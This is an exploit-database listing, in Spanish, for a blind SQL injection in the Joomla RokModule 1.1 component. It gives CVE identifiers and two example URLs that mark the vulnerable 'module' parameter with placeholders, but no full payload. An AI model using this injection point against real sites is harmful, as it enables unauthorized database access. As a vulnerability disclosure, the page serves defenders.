[] NeoSense
E X P L O I T S
title author type platform port cve id

Joomla! Component RokModule 1.1 - 'module' Blind SQL Injection

Author: Yarolinux
type: webapps
platform: php
port: 
date_added: 2012-09-10 
date_updated: 2016-12-20 
verified: 0 
codes: CVE-2010-1480;OSVDB-63710;CVE-2010-1479 
tags: 
aliases:  
screenshot_url:  
application_url: 
Titulo: Joomla Component RokModule Blind SQLi [module] Vulnerability

Nombre del Componente: Com_rokmodule

Empresa: http://www.rockettheme.com/

Testeado: Linux Backtrack

Autor: Yarolinux Para WebSecurityDev
Twitter: @Yarolinux

Fecha: 09/09/2012

Bueno la Injeccion Va de la siguiente manera:

http://localhost/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]

http://localhost/web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]or[BlindSQLi]


Ok! Eso es todo Difrutenlo!

Estamos trabajando en un laboratorio testeandolo en Joomla 1.7, Muy
pronto resultados :D

Greetz: Dylan Irzi & WebSecurityDev
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.